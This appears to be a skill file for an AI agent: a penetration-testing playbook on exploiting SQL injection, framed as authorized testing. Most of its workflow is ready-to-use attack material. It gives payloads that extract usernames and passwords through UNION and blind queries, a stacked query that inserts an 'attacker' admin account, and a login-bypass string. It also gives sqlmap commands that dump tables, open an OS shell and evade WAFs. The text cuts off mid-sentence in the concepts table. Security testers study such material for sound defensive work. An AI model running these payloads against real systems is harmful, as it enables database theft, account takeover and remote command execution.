exploiting-sql-injection-vulnerabilities

What this skill does

# Exploiting SQL Injection Vulnerabilities

## When to Use

- Testing web application input parameters for SQL injection vulnerabilities during an authorized penetration test
- Validating that parameterized queries and input sanitization are properly implemented across all database interactions
- Demonstrating the business impact of a confirmed SQL injection vulnerability by extracting sensitive data
- Verifying that WAF rules and input validation controls effectively block SQL injection payloads
- Testing stored procedures, dynamic SQL, and ORM bypass scenarios in enterprise applications

**Do not use** against databases without written authorization, for extracting or exfiltrating actual customer data beyond what is needed for proof of concept, or against production databases where exploitation could corrupt data integrity.

## Prerequisites

- Written authorization specifying the target application and permissible level of exploitation (detection only vs. full exploitation)
- Burp Suite Professional configured as an intercepting proxy to capture and modify HTTP requests
- sqlmap installed with current version for automated detection and exploitation
- Knowledge of the target database engine (MySQL, PostgreSQL, MSSQL, Oracle) or ability to fingerprint it
- Test accounts at various privilege levels to test injection in authenticated contexts

## Workflow

### Step 1: Injection Point Discovery

Identify parameters that interact with the database:

- **Map all input vectors**: Catalog every parameter in URLs (GET), request bodies (POST), HTTP headers (Cookie, Referer, User-Agent, X-Forwarded-For), and JSON/XML API payloads
- **Error-based detection**: Inject a single quote (`'`) into each parameter and observe the response. SQL errors (e.g., "You have an error in your SQL syntax", "unterminated quoted string", "ORA-01756") confirm the parameter reaches the database unsanitized.
- **Boolean-based detection**: Inject `' AND 1=1--` (true condition) and `' AND 1=2--` (false condition). If the responses differ (different content length, different data returned, different HTTP status), the parameter is injectable.
- **Time-based detection**: Inject `'; WAITFOR DELAY '0:0:5'--` (MSSQL), `' AND SLEEP(5)--` (MySQL), or `'; SELECT pg_sleep(5)--` (PostgreSQL). A 5-second response delay confirms injection.
- **Out-of-band detection**: Use payloads that trigger DNS or HTTP requests to a Burp Collaborator domain to confirm injection in scenarios where responses are not directly observable.
- **Second-order injection**: Test for injection where input is stored and later used in a different SQL query (e.g., username stored at registration, used in a query on the profile page).

### Step 2: Database Fingerprinting

Determine the database engine and version to select appropriate exploitation techniques:

- **Error-based fingerprinting**: Each database produces distinctive error messages. MySQL includes "MySQL", MSSQL mentions "SQL Server", PostgreSQL references "PG", Oracle contains "ORA-".
- **Function-based fingerprinting**: Inject database-specific functions:
  - MySQL: `' AND VERSION()--` or `' AND @@version--`
  - MSSQL: `' AND @@version--` or `' AND DB_NAME()--`
  - PostgreSQL: `' AND version()--`
  - Oracle: `' AND banner FROM v$version--`
- **String concatenation differences**: MySQL uses `CONCAT('a','b')` or `'a' 'b'`, MSSQL uses `'a'+'b'`, PostgreSQL uses `'a'||'b'`, Oracle uses `'a'||'b'`
- **Comment syntax**: MySQL supports `#` and `-- `, MSSQL uses `-- `, PostgreSQL uses `-- `, Oracle uses `-- `

### Step 3: Manual Exploitation Techniques

Exploit confirmed injection points using technique-appropriate methods:

- **UNION-based extraction**: Determine the number of columns with `ORDER BY` incrementing (`' ORDER BY 1--`, `' ORDER BY 2--`, etc. until an error occurs). Then construct UNION SELECT to extract data:
  ```
  ' UNION SELECT NULL,username,password,NULL FROM users--
  ```
- **Error-based extraction** (MySQL): Use `EXTRACTVALUE` or `UPDATEXML` to force data into error messages:
  ```
  ' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version),0x7e))--
  ```
- **Blind boolean extraction**: Extract data one character at a time by testing character values:
  ```
  ' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--
  ```
- **Time-based blind extraction**: Same character-by-character approach using time delays:
  ```
  ' AND IF(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a',SLEEP(5),0)--
  ```
- **Stacked queries** (where supported): Execute additional SQL statements:
  ```
  '; INSERT INTO users(username,password,role) VALUES('attacker','password','admin')--
  ```

### Step 4: Automated Exploitation with sqlmap

Use sqlmap for efficient exploitation of confirmed injection points:

- **Basic detection**: `sqlmap -u "https://target.com/page?id=1" --batch --random-agent` to detect injection and identify the database
- **Extract databases**: `sqlmap -u "https://target.com/page?id=1" --dbs` to list all databases
- **Extract tables**: `sqlmap -u "https://target.com/page?id=1" -D <database> --tables` to list tables
- **Extract data**: `sqlmap -u "https://target.com/page?id=1" -D <database> -T users --dump --threads 5` to extract table contents
- **POST parameters**: `sqlmap -u "https://target.com/login" --data="username=test&password=test" -p username` to test POST parameters
- **Cookie injection**: `sqlmap -u "https://target.com/page" --cookie="session=abc123; id=1*" --level 2` to test cookie parameters (mark injectable parameter with *)
- **OS command execution** (if DB user has sufficient privileges): `sqlmap -u "https://target.com/page?id=1" --os-shell` to attempt command execution via xp_cmdshell (MSSQL) or INTO OUTFILE (MySQL)
- **Tamper scripts**: `sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,between` to bypass WAF filters

### Step 5: Impact Demonstration and Reporting

Document the full impact of the SQL injection vulnerability:

- **Data extraction evidence**: Capture screenshots or sqlmap output showing extracted database names, table schemas, and sample records (redact actual PII in the report)
- **Authentication bypass**: Demonstrate login bypass with `admin' OR 1=1--` and document the bypassed authentication mechanism
- **Privilege escalation**: If the database user has DBA privileges, document what additional capabilities are available (file read/write, command execution)
- **Lateral movement potential**: Document if the database server has network access to other internal systems that could be reached through OS-level access gained via SQLi
- **Remediation**: Provide specific code-level fixes showing the vulnerable query and the corrected parameterized version

## Key Concepts

| Term | Definition |
|------|------------|
| **SQL Injection** | A code injection technique that exploits unvalidated user input in SQL queries to manipulate database operations, extract data, or execute administrative operations |
| **Union-Based SQLi** | Injection technique that appends a UNION SELECT statement to the original query to extract data from other tables in the same response |
| **Blind SQL Injection** | Injection where the application does not return query results directly; the attacker infers data through boolean responses or time delays |
| **Parameterized Query** | A prepared SQL statement where user input is passed as parameters rather than concatenated into the query string, preventing injection |
| **Second-Order Injection** | SQL injection where the malicious payload is stored by the application and executed in a different context or SQL query at a later time |
| **Stacked Queries** | Executing multiple SQL statements separated by semicolons in a single request, enabling INSERT, UPDATE, or DELETE operations through injection |
| **WAF Bypass** | Techniques for evading Web Application Firewall rules that block common SQL injection patterns, using encoding, alternate syntax, or fragment